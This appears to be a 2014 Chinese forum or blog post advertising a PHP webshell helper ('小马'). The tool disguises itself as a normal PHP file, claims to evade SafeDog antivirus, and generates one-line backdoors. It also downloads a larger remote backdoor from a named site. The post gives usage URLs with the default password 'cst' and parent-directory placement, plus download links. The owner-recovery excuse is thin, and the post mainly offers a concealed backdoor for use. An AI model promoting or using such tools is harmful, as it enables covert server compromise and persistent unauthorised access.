CST专用php辅助型小马

代号:cst专用php辅助型网站管理助手(Getcode)
代号:零一
特色:隐蔽 +免杀+突破安全狗的一些防御功能
类型:辅助型程序

功能:生成一句话管理代码,远程下载后门。支持以单文件形式存在,也可以把代码插入到正常php文件里面,可以用工具配合本软件批量生成!!并且有返回值,返回值需要查看网站源代码方式浏览,因为是使用注释掉的哦。

背景:现在很多垃圾的建站公司,都是再给客户做好网站后,连虚拟主机的ftp都不给客户,当网站有漏洞需要修补,或者网站被入侵需要修补漏洞等等时候,自 己网站自己却没有管理方法,是不是很悲剧?特别是当建站公司的人跑路了,自己的空间也要到期,数据都拿不出来了! 所以,将本文件想办法放在网站的目录里面,配合“菜刀”等,完全可以实现ftp的文件操作所有功能了!

使用说明:本程序和正常的php程序差不多,非专业人士就算查看本代码,也不容易发现这是一个后门。前面的大部分代码都是没有用的正常过程函数。有用的代 码在后面。必须带指定参数才可以正常使用!直接访问本文件显示空白。过安全狗等主流软件生成木马,不会被劫持。直接GET提交数据一键生成!

支持无FSO生成木马(远程下载)。

================================================================================
最新版本:1.1

说明:

在代码头部,加上了无用的正常的函数过程代码,主要用于让别人认为这是一个正常文件,就算打开查看也没用异常。

修复一个下载BUG。

貌似下载文件命名有点错误,过几天在和其他一些功能的添加一起修复BUG,现在临时更改一下。也就是暂时去掉了下载大马可以自定义文件名的功能,1.1版本生成的是固定的。

也就是说,在看下面的使用例子的时候,下载功能的使用稍微变化了下,

提交参数xxxx.php?key=cst&dname=任何东东,就可以下载远程过安全狗的PHP大马到当前目录,这个下载生成功能也是过安全狗的。

下载后的保存地址是当前目录+cstdown.php    密码还是cst


===============================================================================

使用的例子:

1:创建。
xxxx.php?key=cst&cname=cst.php

上图中xxxx.php表示你的后门文件名称,key=cst是本程序的默认密码验证,cname=cst.php中的cst.php表示你要生成的一句 话后门的名称,支持../符号。表示后门的上一层目录生成。如xxxx.php?key=cst&cname=../cst.php

2:远程下载。

xxxx.php?key=cst&dname=cst.php

上图中xxxx.php表示你的后门文件名称,key=cst是本程序的默认密码验证,dname=cst.php中的cst.php表示你要下载的后门 的名称,支持../符号。表示后门的上一层目录生成。如xxxx.php?key=cst&dname=../cst.php


说明:本程序的默认下载功能下载的远程文件,是放在C.S.T的大马文件。代码是明文的。此大马是过部分安全狗的。大家可以直接下载这个rar之后用记事本打开!绝不会存在后门等垃圾东西。www.0xcode.org/tools/web/php/phpbig.rar  默认密码是cst.


注意,文件后缀为rar,并不是说这个文件就是压缩文件,为了PHP远程下载方便,只是把txt改为了rar后缀,所以下载之后使用记事本等软件直接打开。


下载地址http://bbs.0xcode.org/thread-528-1-1.html


2014-10-05 1
评论
热度(1)